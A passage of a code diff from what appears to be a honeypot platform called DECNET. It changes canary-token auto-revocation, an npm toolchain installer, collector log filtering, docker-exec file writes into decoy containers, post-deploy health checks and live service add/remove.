"occurred_at": datetime.now(timezone.utc),
@@ -171,7 +321,7 @@ async def _record_hit(
"user_agent": user_agent,
"request_path": request_path,
"dns_qname": dns_qname,
"raw_headers": raw_headers or {},
"raw_headers": final_headers,
})
try:
await bus.publish(
@@ -189,6 +339,22 @@ async def _record_hit(
except Exception as e: # noqa: BLE001 — best effort
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
# Auto-deregister fingerprint canaries after the first valid fingerprint
# is collected. Slug goes dark; the stealth posture means the attacker
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
# http/dns canaries are NOT auto-revoked.
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
try:
await repo.update_canary_token_state(token["uuid"], "revoked")
await bus.publish(
topics.canary(token["uuid"], topics.CANARY_REVOKED),
{"token_id": token["uuid"], "trigger_id": trigger_id,
"reason": "fingerprint_collected"},
)
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
# ---------------------------- DNS surface --------------------------------

View File

@@ -1,8 +1,13 @@
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
``@app.command(name="canary")`` Typer entry point that delegates to
:func:`decnet.canary.worker.run`.
Two entry points share this module:
* ``decnet canary`` — runs the worker process. Mirrors the shape of
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
systemd unit so its argv must stay stable.
* ``decnet canary-install-toolchain`` — provisions the Node side of
the fingerprint-canary obfuscator. Idempotent; safe to call from
the API service unit's ``ExecStartPre``.
Not master-only — any host that hosts deckies can run its own
canary worker (the bus events stay local; the webhook worker on
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
"""
from __future__ import annotations
import shutil
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
from pathlib import Path
import typer
from . import utils as _utils
from .utils import console, log
_TOOLCHAIN_TIMEOUT_S = 180
def register(app: typer.Typer) -> None:
@app.command(name="canary")
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
asyncio.run(run())
except KeyboardInterrupt:
console.print("\n[yellow]Canary worker stopped.[/]")
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
npm_bin: str = typer.Option(
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
),
) -> None:
"""Install the Node-side toolchain used by fingerprint canaries.
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
directory so the obfuscator's helper script can ``require()``
``javascript-obfuscator`` at mint time. Requires Node >= 18.
Idempotent: re-running on an already-installed tree is fast
(npm short-circuits when ``node_modules/`` is up-to-date).
"""
import decnet.canary as _canary_pkg
canary_dir = Path(_canary_pkg.__file__).resolve().parent
if not (canary_dir / "package.json").is_file():
console.print(
f"[red]canary package.json not found under {canary_dir}; "
"wheel may be missing the JS toolchain payload.[/]"
)
raise typer.Exit(code=2)
if shutil.which(npm_bin) is None:
console.print(
f"[red]npm executable {npm_bin!r} not found on PATH. "
"Install Node >= 18 and re-run.[/]"
)
raise typer.Exit(code=2)
console.print(
f"[cyan]installing canary toolchain[/] in {canary_dir}",
)
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
cwd=str(canary_dir),
capture_output=True, text=True,
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
)
except subprocess.TimeoutExpired:
console.print("[red]npm install timed out after 3 minutes[/]")
raise typer.Exit(code=3) from None
if proc.returncode != 0:
console.print(
f"[red]npm install failed rc={proc.returncode}[/]\n"
f"{proc.stderr.strip()}"
)
raise typer.Exit(code=proc.returncode)
console.print("[green]canary toolchain ready[/]")

View File

@@ -74,6 +74,7 @@ _CONFIG_PLACEHOLDER = """\
# master-host = 10.0.0.1
# syslog-port = 6514
# swarmctl-port = 8770
# swarmctl-host = 127.0.0.1
# [logging]
# system-log = /var/log/decnet/decnet.system.log

View File

@@ -16,8 +16,16 @@ from .utils import console, log
def register(app: typer.Typer) -> None:
@app.command()
def swarmctl(
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
port: int = typer.Option(
8770, "--port",
envvar="DECNET_SWARMCTL_PORT",
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
),
host: str = typer.Option(
"127.0.0.1", "--host",
envvar="DECNET_SWARMCTL_HOST",
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
),
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),

View File

@@ -233,8 +233,8 @@ def _delete(
topo = await repo.get_topology(topology_id)
if topo is None:
return False, "not-found"
if topo["status"] in _RUNNING:
return False, str(topo["status"])
if topo.status in _RUNNING:
return False, str(topo.status)
ok = await repo.delete_topology_cascade(topology_id)
return ok, None

View File

@@ -342,7 +342,7 @@ def combined_campaign_weight(
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
Treats one ``SyntheticAttacker`` as one identity — adequate for

View File

@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
def from_synthetic(att) -> Observation:
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
Lives here so test code doesn't import the factory shape into the

View File

@@ -75,6 +75,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
)
_RL_MAX_ENTRIES: int = 10_000
# APP-NAMEs we never want to see in the ingestion stream — native unix
# daemons that share a container with a DECNET service. Their logs are
# noise: sshd's "Failed password for root from X" duplicates the
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
# again, and CRON/systemd/etc. say nothing about attacker behavior.
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
_DROP_APPS: frozenset[str] = frozenset(
a.strip()
for a in os.environ.get(
"DECNET_COLLECTOR_DROP_APPS",
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
).split(",")
if a.strip()
)
_rl_lock: threading.Lock = threading.Lock()
_rl_last: dict[tuple[str, str, str, str], float] = {}
@@ -82,10 +97,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
def _should_ingest(parsed: dict[str, Any]) -> bool:
"""
Return True if this parsed event should be written to the JSON ingestion
stream. Rate-limited connection-lifecycle events return False when another
event with the same (attacker_ip, decky, service, event_type) was emitted
inside the dedup window.
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
rate-limits connection-lifecycle events within a dedup window.
"""
if parsed.get("service", "") in _DROP_APPS:
return False
event_type = parsed.get("event_type", "")
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
return True
@@ -220,6 +236,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
except ValueError:
ts_formatted = ts_raw
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
# "CMD ") get event_type rewritten to "command". `fields` stays empty
# so the frontend's msg-based pill rendering doesn't double up.
if event_type == "-" and msg.startswith("CMD "):
event_type = "command"
return {
"timestamp": ts_formatted,
"decky": decky,

View File

@@ -39,6 +39,7 @@ Shape::
master-host = 10.0.0.1 # required on agents
syslog-port = 6514
swarmctl-port = 8770
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
[logging]
system-log = /var/log/decnet/decnet.system.log
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
"master-host": "DECNET_SWARM_MASTER_HOST",
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
"swarmctl-port": "DECNET_SWARMCTL_PORT",
"swarmctl-host": "DECNET_SWARMCTL_HOST",
},
"logging": {
"system-log": "DECNET_SYSTEM_LOGS",

View File

@@ -137,6 +137,19 @@ def parse_line(line: str) -> LogEvent | None:
msg = tail.group(1).strip() if tail else ""
attacker_ip = _extract_attacker_ip(fields, msg)
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
# Without this rewrite they're invisible to the behavioral profiler, which
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
# invocation uses --msgid command, so we must also handle the non-nil case.
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
event_type = "command"
head, sep, cmd_rest = msg[4:].partition("cmd=")
for k, v in re.findall(r'(\w+)=(\S+)', head):
fields.setdefault(k, v)
if sep:
fields.setdefault("command", cmd_rest)
# Mutator-emitted transitions arrive on the same ingest stream but
# belong in the substrate-state index, not the per-IP attacker one.
kind: EventKind = (

View File

@@ -70,7 +70,7 @@ async def run_reuse_loop(
wake_tasks.append(asyncio.create_task(
_run_control_listener_signal(bus, "reuse-correlator"),
))
except Exception as exc: # noqa: BLE001
except Exception as exc:
log.warning(
"reuse correlator: bus unavailable, running in poll-only mode: %s",
exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
results = await engine.correlate_credential_reuse(
repo, min_targets=min_targets,
)
except Exception: # noqa: BLE001
except Exception:
log.exception("reuse correlator: tick failed")
results = []
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
wake.set()
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
except Exception as exc:
log.warning(
"reuse correlator: subscriber for %s died (%s); falling back to poll",
pattern, exc,

View File

@@ -0,0 +1,39 @@
"""Shared primitives for writing/deleting files inside running deckies.
The canary planter and the orchestrator SSH driver both need to drop
bytes into a decky container's filesystem, then sometimes unlink them.
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
before this module existed.
Public API:
* :func:`write_file_to_container` — write bytes at a path, set mode,
optionally backdate mtime.
* :func:`delete_file_from_container` — best-effort ``rm -f``.
* :func:`resolve_topology_container` — pick the right docker container
for a MazeNET decky based on its services list.
* :func:`resolve_decky_container` — async helper that takes
``(decky_name, topology_id?)``, hydrates the topology when needed,
and returns the docker container name.
Container resolution conventions are documented in
:mod:`decnet.topology.compose`; we mirror them here without taking
a runtime dependency on the compose generator.
"""
from __future__ import annotations
from .resolve import (
resolve_decky_container,
resolve_topology_container,
)
from .write import (
delete_file_from_container,
write_file_to_container,
)
__all__ = [
"delete_file_from_container",
"resolve_decky_container",
"resolve_topology_container",
"write_file_to_container",
]

View File

@@ -0,0 +1,72 @@
"""Decky-name → docker container name resolution.
Two scopes:
* **Fleet**: every fleet decky has a ``ssh`` service container named
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
target it because it carries the most realistic filesystem layout.
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
decky exposes the ssh service; otherwise the decky's base container
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
:func:`decnet.topology.compose._container_name`).
Keeping resolution centralised here means new ``docker exec`` callers
(file drops, future bulk planters, etc.) never need to learn the
naming conventions — they just call :func:`resolve_decky_container`.
"""
from __future__ import annotations
from typing import Any, Iterable, Optional
_SSH_CONTAINER_SUFFIX = "-ssh"
def resolve_topology_container(
topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
"""Container name for a MazeNET decky.
See module docstring for the convention. Pure function — no I/O.
"""
if "ssh" in set(services):
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
return f"decnet_t_{topology_id[:8]}_{decky_name}"
async def resolve_decky_container(
repo: Any,
decky_name: str,
*,
topology_id: Optional[str] = None,
) -> str:
"""Resolve the docker container name for *decky_name*.
Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
unconditionally. No DB lookup — the caller is responsible for
knowing the decky exists; if it doesn't, the subsequent
``docker exec`` returns a clear error.
Topology path: hydrates the topology, looks up the decky's services
list, delegates to :func:`resolve_topology_container`.
Raises:
LookupError — when ``topology_id`` is set but the topology or
its named decky doesn't exist. Callers translate this into
404/422 at the API layer.
"""
if topology_id is None:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
from decnet.topology.persistence import hydrate
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
raise LookupError(f"topology {topology_id!r} not found")
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
name = cfg.get("name") or decky.get("name")
if name == decky_name:
services = decky.get("services") or []
return resolve_topology_container(topology_id, decky_name, services)
raise LookupError(
f"decky {decky_name!r} is not in topology {topology_id!r}"
)

124
decnet/decky_io/write.py Normal file
View File

@@ -0,0 +1,124 @@
"""``docker exec``-driven file write/delete inside a decky container.
The write path streams a base64-encoded payload over stdin to
``base64 -d`` inside the container, so binary content of any size up
to docker's stream limits is safe — interpolating bytes into argv
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
"""
from __future__ import annotations
import asyncio
import base64
import shlex
from datetime import datetime, timezone
from typing import Optional
from decnet.logging import get_logger
log = get_logger("decky_io.write")
_DOCKER = "docker"
_DEFAULT_TIMEOUT = 8.0
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
argv: list[str],
*,
stdin_bytes: Optional[bytes] = None,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=timeout,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
async def write_file_to_container(
container: str,
path: str,
content: bytes,
*,
mode: int = 0o644,
mtime: Optional[datetime] = None,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
"""Write *content* to *path* inside *container* via ``docker exec``.
The directory above *path* is created if missing; *mode* is applied
after the write; when *mtime* is provided the file is backdated via
``touch -d`` (UTC ISO 8601).
Returns ``(success, error_or_none)``. ``error`` is the trimmed
docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
"""
if not path:
return False, "empty path"
encoded = base64.b64encode(content)
parts = [
f"mkdir -p {shlex.quote(_dirname(path))}",
f"base64 -d > {shlex.quote(path)}",
f"chmod {mode:o} {shlex.quote(path)}",
]
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
sh_cmd = " && ".join(parts)
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
success = rc == 0
if success:
return True, None
err = stderr.strip()[:256] or f"rc={rc}"
log.warning(
"decky_io.write failed container=%s path=%s rc=%d stderr=%r",
container, path, rc, stderr[:120],
)
return False, err
async def delete_file_from_container(
container: str,
path: str,
*,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
"""Best-effort ``rm -f`` of *path* inside *container*.
Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even
when the file is already gone, so a True result here means "the
file is not present after this call", regardless of who unlinked it.
"""
sh_cmd = f"rm -f {shlex.quote(path)}"
argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, timeout=timeout)
if rc == 0:
return True, None
return False, stderr.strip()[:256] or f"rc={rc}"

View File

@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
"""
import asyncio
import json
import shutil
import subprocess # nosec B404
import time
@@ -163,6 +164,48 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
shutil.copy2(src, dest)
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
Used for post-deploy verification: ``compose up -d`` returns 0 the
moment containers are *started*, but a service that crashes on boot
(port collision, bad image, missing dependency) only shows up here.
Returns an empty list when compose has nothing to report (and on
parse failure — caller treats that as 'unverifiable, don't gate').
"""
cmd = [
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
"ps", "--all", "--format", "json",
]
try:
result = subprocess.run( # nosec B603
cmd, capture_output=True, text=True, check=False,
)
except FileNotFoundError:
return []
if result.returncode != 0:
return []
rows: list[dict[str, object]] = []
# ``docker compose ps --format json`` emits one JSON object per line
# (newline-delimited), not a JSON array. Parse line-by-line so a
# single bad line doesn't poison the whole result.
for line in (result.stdout or "").splitlines():
line = line.strip()
if not line:
continue
try:
obj = json.loads(line)
except json.JSONDecodeError:
continue
if isinstance(obj, dict):
rows.append(obj)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, dict):
rows.append(item)
return rows
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
import os
# -p decnet pins the compose project name. Without it, docker compose
@@ -953,8 +996,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
)
raise
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Post-deploy verification: ``compose up -d`` returns 0 the moment
# containers are *started*, so a service that crashes on boot
# (port bind failure, bad image, missing dependency) leaves the
# topology row sitting at ACTIVE while half the substrate is dead.
# Sample compose ps once and downgrade to DEGRADED if any expected
# container isn't running — operators see real state instead of an
# optimistic flag.
ps_rows = await anyio.to_thread.run_sync(
lambda: _compose_ps(compose_path),
)
bad: list[str] = []
# Build the per-decky state map. The base container's compose
# service name == decky name, which is what we cache on the
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
# don't gate the decky's state — service-level failures are visible
# in compose ps separately and don't downgrade the decky as a whole.
decky_state_by_name: dict[str, str] = {}
for row in ps_rows:
state = str(row.get("State", "")).lower()
service_name = str(row.get("Service") or "")
if service_name and "-" not in service_name:
# Plain decky base; cache its docker state.
decky_state_by_name[service_name] = state or "unknown"
if state and state != "running":
name = str(row.get("Name") or row.get("Service") or "?")
exit_code = row.get("ExitCode")
bad.append(
f"{name}={state}"
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
)
# Reconcile each TopologyDecky.state from compose's view. Without
# this, the row stays at the default 'pending' forever and the
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
# actually up.
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
ds = decky_state_by_name.get(decky_name, "unknown")
new_state = "running" if ds == "running" else "failed"
try:
await repo.update_topology_decky(
decky["uuid"], {"state": new_state},
)
except Exception as exc: # noqa: BLE001
log.warning(
"post-deploy state reconcile failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
if bad:
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
)
await transition_status(
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
)
log.warning(
"topology %s deployed but %d container(s) unhealthy: %s",
topology_id, len(bad), reason,
)
else:
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Best-effort canary baseline seed across every decky in the
# topology. Same resilience contract as the fleet path: failures
# surface as state=failed token rows, never abort the deploy.
try:
from decnet.canary import planter as _canary_planter
await _canary_planter.seed_baseline_topology(repo, topology_id)
except Exception as exc: # noqa: BLE001
log.warning(
"canary baseline seed failed (best-effort) topology=%s err=%s",
topology_id, exc,
)
@_traced("engine.teardown_topology")

View File

@@ -0,0 +1,673 @@
"""Add/remove a single service on a deployed decky without full redeploy.
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
supports per-service targeting (``up --no-deps -d <svc>``,
``stop <svc>``, ``rm -f <svc>``). What was missing was the
orchestration: regenerate the compose file (so future redeploys reflect
the change), persist the new ``services`` list, and run the targeted
compose command.
Two scopes:
* **Topology** — source of truth is the ``topology_deckies`` table; the
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
* **Fleet** — source of truth is ``decnet-state.json`` (with the
``fleet_deckies`` table mirroring it); compose is the unihost
``decnet-compose.yml``.
Both publish ``decky.<name>.service.added`` /
``decky.<name>.service.removed`` on the bus. The new topic constants
are documented in ``wiki-checkout/Service-Bus.md``.
"""
from __future__ import annotations
import subprocess # nosec B404
from pathlib import Path
from typing import Any, Literal, Optional
import anyio
from decnet.bus import topics
from decnet.logging import get_logger
from decnet.services.base import BaseService
from decnet.services.registry import get_service
from decnet.topology.persistence import hydrate
from decnet.web.db.repository import BaseRepository
# Heavy imports (composer/deployer pull in decnet.network → docker) are
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
# pattern in decnet.canary.planter for the same reason.
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
"""Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
Real implementation lives in :mod:`decnet.engine.deployer`; we
import-and-delegate at call time to keep this module's import graph
clean (see module docstring above).
"""
from decnet.engine.deployer import _compose as _real_compose
if compose_file is None:
_real_compose(*args, env=env)
else:
_real_compose(*args, compose_file=compose_file, env=env)
def _topology_compose_path(topology_id: str) -> Path:
from decnet.engine.deployer import _topology_compose_path as _real_path
return _real_path(topology_id)
def _write_topology_compose(hydrated, path: Path) -> Path:
from decnet.topology.compose import write_topology_compose
return write_topology_compose(hydrated, path)
def _load_state():
from decnet.config import load_state as _real_load_state
return _real_load_state()
def _save_state(config, compose_path) -> None:
from decnet.config import save_state as _real_save_state
_real_save_state(config, compose_path)
def _write_compose(config, compose_path) -> None:
from decnet.composer import write_compose as _real_write_compose
_real_write_compose(config, compose_path)
def _get_bus():
from decnet.bus.factory import get_bus
return get_bus()
# --------------------------- swarm propagation helpers ---------------------------
#
# Service mutations (add/remove/update_config) on a deployed decky used to run
# the master's local docker-compose only. For swarm fleet deckies the master
# has no containers; for agent-targeted topologies the master only writes a
# compose file the worker never sees. These helpers replay the change to the
# worker so the env actually lands.
#
# Lazy imports keep this module's import graph clean (composer/swarm pull in
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
shards = await repo.list_decky_shards()
for s in shards:
if s.get("decky_name") == decky_name:
return s.get("host_uuid")
return None
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
"""Re-push the host's full shard to its worker agent.
Uses the same code path as POST /swarm/deploy: load master state, filter
to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
The agent regenerates compose and recreates only the changed containers.
Idempotent for unchanged deckies.
"""
from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
state = _load_state()
if state is None:
log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
return
config, _compose_path = state
host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
if not host_deckies:
log.warning(
"redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
host_uuid,
)
return
filtered = config.model_copy(update={"deckies": host_deckies})
await dispatch_decnet_config(filtered, repo)
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
"""If the topology is agent-pinned, push the latest hydrated blob to the worker."""
from decnet.engine.deployer import resync_agent_topology
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
if not hydrated.get("topology", {}).get("target_host_uuid"):
return # unihost topology — local compose is authoritative
await resync_agent_topology(repo, topology_id)
log = get_logger("engine.services_live")
DeckyKind = Literal["fleet", "topology"]
class ServiceMutationError(ValueError):
"""Raised for caller-correctable failures. The API layer dispatches on
subclass to produce 4xx codes; base class maps to 422.
"""
class ServiceNotFoundError(ServiceMutationError):
"""Decky or topology does not exist → 404."""
class ServiceConflictError(ServiceMutationError):
"""Idempotency violation (already on / not on) → 409."""
def _validate_service_for_per_decky(name: str) -> BaseService:
"""Return the registered service or raise ``ServiceMutationError``.
``fleet_singleton`` services run once per fleet (e.g. an LLMNR
responder), not per-decky — we reject the per-decky add/remove
request rather than silently producing a no-op compose entry.
"""
try:
svc = get_service(name)
except KeyError as exc:
raise ServiceMutationError(f"unknown service {name!r}") from exc
if svc.fleet_singleton:
raise ServiceMutationError(
f"service {name!r} is fleet_singleton; not addable per-decky"
)
return svc
async def _publish(topic: str, payload: dict[str, Any]) -> None:
"""Best-effort bus publish — same shape as the canary planter's helper."""
try:
bus = _get_bus()
await bus.connect()
await bus.publish(topic, payload)
await bus.close()
except Exception as e: # noqa: BLE001
log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
# ---------------------------------------------------------- topology path
async def _topology_decky(
repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
raise ServiceNotFoundError(f"topology {topology_id!r} not found")
for d in hydrated["deckies"]:
cfg = d.get("decky_config") or {}
name = cfg.get("name") or d.get("name")
if name == decky_name:
return d
raise ServiceNotFoundError(
f"decky {decky_name!r} is not in topology {topology_id!r}"
)
async def _rerender_topology_compose(
repo: BaseRepository, topology_id: str,
) -> Path:
"""Re-hydrate + re-render the per-topology compose file.
Called after a successful DB update so future deploys reflect the
change; without this the file would still describe the old service
set and a subsequent ``up -d`` would resurrect the removed service.
"""
hydrated = await hydrate(repo, topology_id)
if hydrated is None: # pragma: no cover — narrow race
raise ServiceNotFoundError(
f"topology {topology_id!r} disappeared mid-mutation"
)
path = _topology_compose_path(topology_id)
_write_topology_compose(hydrated, path)
return path
async def _add_topology_service(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
initial_config: dict | None = None,
) -> list[str]:
decky = await _topology_decky(repo, topology_id, decky_name)
services: list[str] = list(decky.get("services") or [])
if service_name in services:
raise ServiceConflictError(
f"service {service_name!r} already on decky {decky_name!r}"
)
services.append(service_name)
update: dict[str, Any] = {"services": services}
# If the caller supplied initial config, fold it into decky_config
# BEFORE compose regen so the first ``up`` materialises the env on
# the new container — no follow-up apply needed.
if initial_config:
cfg_blob = dict(decky.get("decky_config") or {})
sc = dict(cfg_blob.get("service_config") or {})
sc[service_name] = initial_config
cfg_blob["service_config"] = sc
update["decky_config"] = cfg_blob
await repo.update_topology_decky(decky["uuid"], update)
compose_path = await _rerender_topology_compose(repo, topology_id)
if await _topology_is_agent_pinned(repo, topology_id):
# Agent-pinned: the master's local compose has nothing to up.
# Push the new hydrated blob to the worker.
await _resync_agent_topology(repo, topology_id)
else:
target = f"{decky_name}-{service_name}"
# Run compose in a worker thread so the API event loop stays
# responsive — same pattern as engine/deployer.deploy_topology.
await anyio.to_thread.run_sync(
lambda: _compose(
"up", "-d", "--no-deps", "--build", target,
compose_file=compose_path,
),
)
return services
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return False
return bool(hydrated.get("topology", {}).get("target_host_uuid"))
async def _remove_topology_service(
repo: BaseRepository,
topology_id: str,
decky_name: str,
service_name: str,
) -> list[str]:
decky = await _topology_decky(repo, topology_id, decky_name)
services: list[str] = list(decky.get("services") or [])
if service_name not in services:
raise ServiceConflictError(
f"service {service_name!r} not on decky {decky_name!r}"
)
services = [s for s in services if s != service_name]
target = f"{decky_name}-{service_name}"
compose_path = _topology_compose_path(topology_id)
agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
if not agent_pinned:
# Stop + rm before persisting + re-rendering so a half-completed
# mutation leaves the operator a clear state to retry from
# (container still running; DB still says service is on).
await anyio.to_thread.run_sync(
lambda: _compose("stop", target, compose_file=compose_path),
)
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", target, compose_file=compose_path),
)
await repo.update_topology_decky(decky["uuid"], {"services": services})
await _rerender_topology_compose(repo, topology_id)
if agent_pinned:
# Worker tears down the removed service when it diffs the
# incoming hydrated blob against its current state.
await _resync_agent_topology(repo, topology_id)
return services
# ---------------------------------------------------------- fleet path
def _fleet_state_or_raise() -> tuple[Any, Path]:
state = _load_state()
if state is None:
raise ServiceMutationError(
"no fleet state on disk — run `decnet up` first"
)
return state
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
for d in config.deckies:
if d.name == decky_name:
return d
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
async def _persist_fleet_change(
repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
"""Persist the mutation to JSON state, compose file, and the DB row."""
config, _ = _load_state()
target = _fleet_find_decky(config, decky.name)
target.services = services
_save_state(config, compose_path)
_write_compose(config, compose_path)
# Mirror to the DB row so DB-only consumers (dashboard, API) see the
# change without waiting for the reconciler.
from decnet.web.db.models import LOCAL_HOST_SENTINEL
await repo.upsert_fleet_decky({
